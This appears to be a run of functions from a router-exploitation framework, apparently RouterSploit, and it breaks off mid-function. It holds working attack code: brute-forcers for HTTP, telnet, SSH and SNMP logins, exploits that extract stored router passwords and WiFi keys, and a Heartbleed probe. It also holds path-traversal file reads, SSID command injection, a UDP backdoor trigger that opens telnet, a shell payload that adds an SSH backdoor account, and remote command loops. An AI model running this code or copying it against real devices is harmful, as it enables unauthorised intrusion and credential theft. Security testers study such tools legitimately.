def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
r = requests.post(url, headers=headers, data=postdata, verify=False)
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
response = http_request("GET", url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if self.credentials:
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
defaults.close()
def attack(self):
url = "{}:{}{}".format(self.target, self.port, self.path)
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = itertools.product(usernames, passwords)
with threads.ThreadPoolExecutor(self.threads) as executor:
for record in collection:
executor.submit(self.target_function, url, record)
if self.credentials:
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()
response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self):
url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
print_status("Running module...")
try:
r = requests.get(url)
res = r.text
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
try:
data = json.loads(res)
print_status("Decoding JSON value")
except ValueError:
print_error("Response is not valid JSON")
return
if len(data):
print_success("Exploit success")
rows = []
for key in data.keys():
if len(data[key]) > 0:
rows.append((key, data[key]))
headers = ("Parameter", "Value")
print_table(headers, *rows)
def hit_hb(self, s):
while True:
typ, ver, pay = self.recvmsg(s)
if typ is None:
print_error(
"No heartbeat response received, server likely not vulnerable"
)
return False
if typ == 24:
print_status("Received heartbeat response")
self.hexdump(pay)
if len(pay) > 3:
print_success(
"WARNING: server returned more data than it should - server is vulnerable!"
)
else:
print_error(
"Server processed malformed heartbeat, but did not return any extra data."
)
return
if typ == 21:
print_error("Server returned error, likely not vulnerable")
print_error("Exploit failed")
return
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10.0)
s.connect((self.target, int(self.port)))
s.send(self.h2bin(self.hello))
except Exception:
print_error("Connection failed: {}:{}".format(self.target, self.port))
return
while True:
typ, ver, pay = self.recvmsg(s)
if typ is None:
print_error("Server closed connection without sending Server Hello.")
print_error("Exploit failed")
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print_status("Sending heartbeat request")
s.send(self.h2bin(self.hb))
self.hit_hb(s)
def run(self):
if self.check():
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
print_status("Requesting for {}".format(url))
response = http_request(method="GET", url=url)
if response is None:
return
regexps = [("admin", "pwdAdmin = '(.+?)'"),
("support", "pwdSupport = '(.+?)'"),
("user", "pwdUser = '******'")]
creds = []
for regexp in regexps:
res = re.findall(regexp[1], response.text)
if len(res):
creds.append((regexp[0], b64decode(res[0])))
if len(creds):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *creds)
print("NOTE: Admin is commonly implemented as root")
else:
print_error("Credentials could not be found")
else:
print_error("Device seems to be not vulnerable")
def run(self):
creds = []
url = "{}:{}/password.cgi".format(self.target, self.port)
print_status("Requesting {}".format(url))
response = http_request(method="GET", url=url)
if response is None:
print_error("Exploit failed - empty response")
return
tokens = [
("admin", r"pwdAdmin = '(.+?)'"),
("support", r"pwdSupport = '(.+?)'"),
("user", r"pwdUser = '******'")
]
print_status("Trying to extract credentials")
for token in tokenize(tokens, response.text):
creds.append((token.typ, token.value[-1]))
if creds:
print_success("Credentials found")
print_table(("Login", "Password"), *creds)
else:
print_error("Exploit failed - credentials could not be found")
def run(self):
rootpath = 'routersploit/modules/'
path = 'exploits/dlink/'
# only py exploit files
modules = [f.replace(".py", "") for f in listdir(rootpath + path) if isfile(join(rootpath + path, f)) and f.endswith(".py") and f != "__init__.py"]
vulns = []
for module_name in modules:
f = path + module_name
module = imp.load_source('module', rootpath + f + '.py')
exploit = module.Exploit()
exploit.target = self.target
exploit.port = self.port
res = exploit.check()
if res is True:
print_success("{} is vulnerable".format(f))
vulns.append(f)
elif res is False:
print_error("{} is not vulnerable".format(f))
else:
print_status("{} could not be verified".format(f))
print
if len(vulns):
print_success("Device is vulnerable!")
for v in vulns:
print " - {}".format(v)
else:
print_error("Device is not vulnerable to any exploits!")
print
def inject_command(self):
ssid_url = "{}:{}/wireless_id.stm".format(self.target, self.port)
response = http_request(method="GET", url=ssid_url)
if response is None:
print_error("Exploit failed. No response from target!")
return
srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";",
response.text)
if srcSSID:
SSID = srcSSID.group(1)
else:
print_error("Exploit failed. Are you logged in?")
return
if len(SSID) + 2 + len(self.cmd) > 32:
newlen = 32 - len(self.cmd) - 2
SSID = SSID[0:newlen]
print_status("SSID too long, it will be truncated to: " + SSID)
newSSID = SSID + "%3B" + self.cmd + "%3B"
payload = "page=radio.asp&location_page=wireless_id.stm&wl_bssid=&wl_unit=0&wl_action=1&wl_ssid=" + newSSID + "&arc_action=Apply+Changes&wchan=1&ssid=" + newSSID
url = "{}:{}/apply.cgi".format(self.target, self.port)
response = http_request(method="POST", url=url, data=payload)
if response is None:
print_error("Exploit failed. No response from target!")
return
err = re.search('countdown\(55\);', response.text)
if err:
print_success("Exploit success, wait until router reboot.")
else:
print_error("Exploit failed. Device seems to be not vulnerable.")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status("Dumping configuration...")
print_info(self.content)
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
self.vulnerabilities = []
self.not_verified = []
target = utils.safe_json_loads(self.target)
if target:
self.target = target
with threads.ThreadPoolExecutor(self.threads) as executor:
for directory in self._exploits_directories:
for exploit in utils.iter_modules(directory):
executor.submit(self.target_function, exploit)
print_info()
if self.not_verified:
print_status("Could not verify exploitability:")
for v in self.not_verified:
print_info(" - {}".format(v))
print_info()
if self.vulnerabilities:
print_success("Device is vulnerable:")
for v in self.vulnerabilities:
print_info(" - {}".format(v))
print_info()
else:
print_error("Could not confirm any vulnerablity\n")
def run(self):
try:
print_status("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet(self.target, 23)
tn.expect(["Login: "******"login: "******"\r\n")
tn.expect(["Password: "******"password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
print_error("Exploit failed")
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Authentication successful")
tn.write("\r\n")
tn.interact()
else:
print_error("Exploit failed")
tn.close()
except:
print_error("Connection error {}:23".format(self.target))
def run(self):
creds = []
url = "{}:{}/backupsettings.conf".format(self.target, self.port)
response = http_request(method="GET", url=url, auth=(self.def_user, self.def_pass))
if response is None:
print_error("Exploit failed")
return
res = re.findall('<AdminPassword>(.+?)</AdminPassword>', response.text)
if len(res):
print_success("Found strings: {}".format(res[0]))
try:
print_status("Trying to base64 decode")
password = base64.b64decode(res[0])
except Exception:
print_error("Exploit failed - could not decode password")
return
creds.append(("admin", password))
print_success("Credentials found!")
print_table(("Login", "Password"), *creds)
else:
print_error("Credentials could not be found")
def run(self):
print_status("Running module...")
self.credentials = []
url = sanitize_url("{}:{}".format(self.target, self.port))
try:
r = requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
if r.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10.0)
print_status("Sending backdoor packet...")
response = ""
try:
sock.sendto("HELODBG", (self.target, 39889))
response = sock.recv(1024)
except Exception:
pass
sock.close()
if "Hello" in response:
print_success("Target seems to vulnerable")
print_status("Trying to connect to the telnet service {}:{}".format(self.target, self.telnet_port))
try:
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.interact()
except Exception:
print_error("Exploit failed - could not connect to the telnet service")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def create_ssh_backdoor(self, username, password):
url = "{}:{}/DetectionPolicy/rules/rulesimport.cgi".format(
self.target, self.port)
sh_name = 'exploit.sh'
sf_action_id = self.get_sf_action_id()
payload = "sudo useradd -g ldapgroup -p `openssl passwd -1 {}` {}; rm /var/sf/SRU/{}".format(
password, username, sh_name)
print_status("Attempting to create SSH backdoor")
multipart_form_data = {
"action_submit": (None, "Import"),
"source": (None, "file"),
"manual_update": (None, "1"),
"sf_action_id": (None, sf_action_id),
"file": (sh_name, payload)
}
try:
http_request(method="POST",
url=url,
files=multipart_form_data,
session=self.session)
except Exception:
pass
return
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, "thread is starting...", verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
except StopIteration:
break
else:
retries = 0
while retries < 3:
try:
tn = telnetlib.Telnet(self.target, self.port)
tn.expect(["Login: "******"login: "******"\r\n")
tn.expect(["Password: "******"password"], 5)
tn.write(password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(
self.target, self.port, name, user, password
),
verbose=module_verbosity,
)
else:
if (
any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500
): # big banner e.g. mikrotik
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(
self.target, self.port, name, user, password
),
verbose=module_verbosity,
)
self.credentials.append((self.target, self.port, user, password))
tn.close()
break
except EOFError:
print_error(name, "Connection problem. Retrying...", verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
continue
print_status(name, "thread is terminated.", verbose=module_verbosity)
def run(self):
rootpath = 'routersploit/modules/'
path = 'exploits/dlink/'
# only py exploit files
modules = [f.replace(".py", "") for f in listdir(rootpath + path) if isfile(join(rootpath + path, f)) and f.endswith(".py") and f != "__init__.py"]
vulns = []
for module_name in modules:
f = path + module_name
module = imp.load_source('module', rootpath + f + '.py')
exploit = module.Exploit()
exploit.target = self.target
exploit.port = self.port
res = exploit.check()
if res is True:
print_success("{} is vulnerable".format(f))
vulns.append(f)
elif res is False:
print_error("{} is not vulnerable".format(f))
else:
print_status("{} could not be verified".format(f))
print
if len(vulns):
print_success("Device is vulnerable!")
for v in vulns:
print " - {}".format(v)
else:
print_error("Device is not vulnerable to any exploits!")
print
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password)
except StopIteration:
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error(name, err, "Username: '******' Password: '******'".format(user, password), verbose=module_verbosity)
else:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self):
self.credentials = []
print_status("Running module...")
ssh = paramiko.SSHClient()
try:
ssh.connect(self.target, port=self.port)
except socket.error:
print_error("Connection error: %s:%s" % (self.target, str(self.port)))
ssh.close()
return
except:
pass
ssh.close()
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def attack(self):
url = "{}:{}{}".format(self.target, self.port, self.path)
response = http_request("GET", url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Digest Auth")
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
with ThreadPoolExecutor(self.threads) as executor:
for record in defaults:
username, password = record.split(':')
executor.submit(self.target_function, url, username, password)
if self.credentials:
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
defaults.close()
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
except StopIteration:
break
else:
retries = 0
while retries < 3:
try:
tn = telnetlib.Telnet(self.target, self.port)
tn.expect(["Login: "******"login: "******"\r\n")
tn.expect(["Password: "******"password"], 5)
tn.write(password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"],
5)
tn.close()
if i != -1:
print_error(name,
"Username: '******' Password: '******'".format(
user, password),
verbose=module_verbosity)
else:
if any(map(lambda x: x in res, [
"#", "$", ">"
])) or len(res) > 500: # big banner e.g. mikrotik
running.clear()
print_success(
"{}: Authentication succeed!".format(name),
user,
password,
verbose=module_verbosity)
self.credentials.append((user, password))
tn.close()
break
except EOFError:
print_error(name,
"Connection problem. Retrying...",
verbose=module_verbosity)
retries += 1
if retries > 2:
print_error(
"Too much connection problems. Quiting...",
verbose=module_verbosity)
return
continue
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self):
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
print_status("Requesting for {}".format(url))
response = http_request(method="GET", url=url)
if response is None:
return
creds = []
admin = re.findall("pwdAdmin = '(.+?)'", response.text)
if len(admin):
creds.append(('Admin', b64decode(admin[0])))
support = re.findall("pwdSupport = '(.+?)'", response.text)
if len(support):
creds.append(('Support', b64decode(support[0])))
user = re.findall("pwdUser = '******'", response.text)
if len(user):
creds.append(('User', b64decode(user[0])))
if len(creds):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *creds)
print("NOTE: Admin is commonly implemented as root")
else:
print_error("Credentials could not be found")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
file_path = "..{}".format(self.filename)
url = "{}:{}/apply.cgi".format(self.target, self.port)
data = {"html_response_page": file_path,
"action": "do_graph_auth",
"login_name": "test",
"login_pass": "******",
"&login_n": "test2",
"log_pass": "******",
"graph_code": "63778",
"session_id": "test5",
"test": "test"}
print_status("Sending request payload using credentials: {} / {}".format(self.username, self.password))
response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
if response is None:
return
if response.status_code == 200:
print_status("File: {}".format(self.filename))
print_info(response.text)
else:
print_error("Exploit failed - could not read response")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def run(self):
url = sanitize_url(
"{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703"
.format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return
try:
print_status("Decoding JSON")
data = json.loads(response.text)
except ValueError:
print_error("Exploit failed - response is not valid JSON")
return
if len(data):
print_success("Exploit success")
rows = []
for key in data.keys():
if len(data[key]) > 0:
rows.append((key, data[key]))
headers = ("Parameter", "Value")
print_table(headers, *rows)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].encode('utf-8').strip()
password = line[1].encode('utf-8').strip()
response = http_request(method="GET",
url=url,
auth=(user, password))
if response.status_code != 401:
running.clear()
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
else:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self):
# address and parameters
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {
"getpage": "html/index.html",
"*errorpage*": "../../../../../../../../../../..{}".format(self.filename),
"var%3Amenu": "setup",
"var%3Apage": "connected",
"var%": "",
"objaction": "auth",
"%3Ausername": "******",
"%3Apassword": "******",
"%3Aaction": "login",
"%3Asessionid": "abcdefgh"
}
# connection
response = http_request(method="POST", url=url, data=data)
if response is None:
return
if response.status_code == 200:
print_success("Exploit success")
print_status("File: {}".format(self.filename))
print response.text
else:
print_error("Exploit failed")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsle")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def run(self):
vulnerabilities = []
for exploit in utils.iter_modules(utils.EXPLOITS_DIR):
exploit = exploit()
exploit.target = self.target
exploit.port = self.port
response = exploit.check()
if response is True:
print_success("{} is vulnerable".format(exploit))
vulnerabilities.append(exploit)
elif response is False:
print_error("{} is not vulnerable".format(exploit))
else:
print_status("{} could not be verified".format(exploit))
if vulnerabilities:
print_info()
print_success("Device is vulnerable!")
for v in vulnerabilities:
print_info(" - {}".format(v))
else:
print_error("Device is not vulnerable to any exploits!\n")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
address = "{}:{}".format(self.target, self.port)
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
string = data.next().strip()
bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0")
res = netsnmp.snmpget(bindvariable, Version=1, DestHost=address, Community=string)
if res[0] is not None:
running.clear()
print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
else:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
cmdGen = cmdgen.CommandGenerator()
while running.is_set():
try:
string = data.next().strip()
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(string),
cmdgen.UdpTransportTarget((self.target, int(self.port))),
'1.3.6.1.2.1.1.1.0',
)
if errorIndication or errorStatus:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password)
except StopIteration:
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error("Target: {}:{} {}: {} Username: '******' Password: '******'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsel", method="wget", binary="wget", location="/var")
else:
print_error("Target is not vulnerable")
def login(self):
url = "{}:{}/login.cgi?logout=1".format(self.target, self.port)
data = {
"username": self.username,
"password": self.password,
"target": ""
}
print_status("Trying to authenticate")
response = http_request(method="POST",
url=url,
data=data,
allow_redirects=False,
session=self.session)
if response is None:
return False
if response.status_code == 302 and "CGISESSID" in response.cookies.keys(
):
print_status("CGI Session ID: {}".format(
response.cookies['CGISESSID']))
print_success("Authenticated as {}:{}".format(
self.username, self.password))
return True
print_error("Exploit failed. Could not authenticate.")
return False
def run(self):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(self.target, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
print_error("Exploit Failed - SSH Service is down")
return
trans = client.get_transport()
try:
trans.auth_password(username='******', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
print_status("Error with Existing Session. Wait few minutes.")
return
try:
trans.auth_interactive(username='******', handler=self.custom_handler)
print_success("Exploit succeeded")
ssh_interactive(client)
except:
print_error("Exploit failed")
return
def run(self):
try:
print_status("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.expect(["Login: "******"login: "******"\r\n")
tn.expect(["Password: "******"password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
print_error("Exploit failed")
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Authentication successful")
tn.write("\r\n")
tn.interact()
else:
print_error("Exploit failed")
tn.close()
except Exception:
print_error("Connection error {}:{}".format(
self.target, self.telnet_port))
def login(self):
url = "{}:{}/".format(self.target, self.port)
try:
response = self.session.get(url=url)
if response is None:
return
print_status("Retrieving random login token...")
Frm_Logintoken = re.findall(r'Frm_Logintoken"\).value = "(.*)";', response.text)
if len(Frm_Logintoken):
Frm_Logintoken = Frm_Logintoken[0]
print_status("Trying to log in with credentials {} : {}".format(self.username, self.password))
url = "{}:{}/login.gch".format(self.target, self.port)
data = {"Frm_Logintoken": Frm_Logintoken,
"Username": self.username,
"Password": self.password}
response = self.session.post(url, data=data)
if "Username" not in response.text and "Password" not in response.text:
print_success("Successful authentication")
return True
except:
pass
return False
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsbe")
else:
print_error("Target is not vulnerable")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
cmdGen = cmdgen.CommandGenerator()
while running.is_set():
try:
string = data.next().strip()
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(string),
cmdgen.UdpTransportTarget((self.target, int(self.port))),
'1.3.6.1.2.1.1.1.0',
)
if errorIndication or errorStatus:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
else:
if boolify(self.exit_on_success):
running.clear()
print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.target, int(self.port)))
s.send(self.h2bin(self.hello))
except:
print_error("Connection failed: {}:{}".format(
self.target, self.port))
return
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
print_error(
"Server closed connection without sending Server Hello.")
print_error("Exploit failed")
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print_status("Sending heartbeat request")
s.send(self.h2bin(self.hb))
self.hit_hb(s)
def login(self):
url = "{}:{}/".format(self.target, self.port)
try:
response = self.session.get(url=url)
if response is None:
return
print_status("Retrieving random login token...")
Frm_Logintoken = re.findall(r'Frm_Logintoken"\).value = "(.*)";',
response.text)
if len(Frm_Logintoken):
Frm_Logintoken = Frm_Logintoken[0]
print_status(
"Trying to log in with credentials {} : {}".format(
self.username, self.password))
url = "{}:{}/login.gch".format(self.target, self.port)
data = {
"Frm_Logintoken": Frm_Logintoken,
"Username": self.username,
"Password": self.password
}
response = self.session.post(url, data=data)
if "Username" not in response.text and "Password" not in response.text:
print_success("Successful authentication")
return True
except:
pass
return False
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
r = requests.post(url, headers=headers, data=postdata, verify=False)
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '******' Password: '******'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def ftp_get_config(self):
print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target,
self.ftp_port,
self.remote_user,
self.remote_pass))
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.ftp_port), timeout=10)
ftp.login(self.remote_user, self.remote_pass)
print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port))
if self.config_path in ftp.nlst():
print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path))
r = StringIO()
ftp.retrbinary('RETR {}'.format(self.config_path), r.write)
ftp.close()
data = r.getvalue()
creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data)
if creds:
print_success("Found encrypted credentials:")
print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds)
return creds
else:
